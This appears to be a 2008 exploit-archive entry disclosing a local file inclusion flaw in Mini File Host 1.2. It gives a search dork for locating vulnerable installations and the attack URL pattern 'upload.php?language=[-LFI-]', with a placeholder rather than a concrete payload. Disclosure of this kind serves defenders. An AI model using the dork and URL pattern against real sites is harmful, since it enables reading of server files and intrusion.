Mini File Host 1.2 (upload.php language) LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini File Host 1.2 (upload.php language) LFI Vulnerability
# Published : 2008-01-17
# Author : Scary-Boys
# Previous Title : PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability
# Next Title : Blogcms 4.2.1b (SQL/XSS) Multiple Remote Vulnerabilities

#########################################################################
#         Mini File Host <= 1.2 Local File Inclusion Vulnerability      #
#########################################################################
AUTHOR     : Scary-Boys							#
HOME       : http://scary-boys.com					#
Download   : http://galaxyscripts.com/forum/downloads.php?do=file&id=1 	#
#########################################################################
DorKs      : "Powered By Mini File Host V1.2"         			#
#########################################################################
## EXPLOIT :                                          			#
http://server.com/Path/pages/upload.php?language=[-LFI-] 		#
#########################################################################
## GREETZ  : S.W.A.T. My Best Friend For Founding This Vuln & Helped Me #
#########################################################################

http://www.galaxyscripts.com/demo/mfh12/

# www.Syue.com [2008-01-17]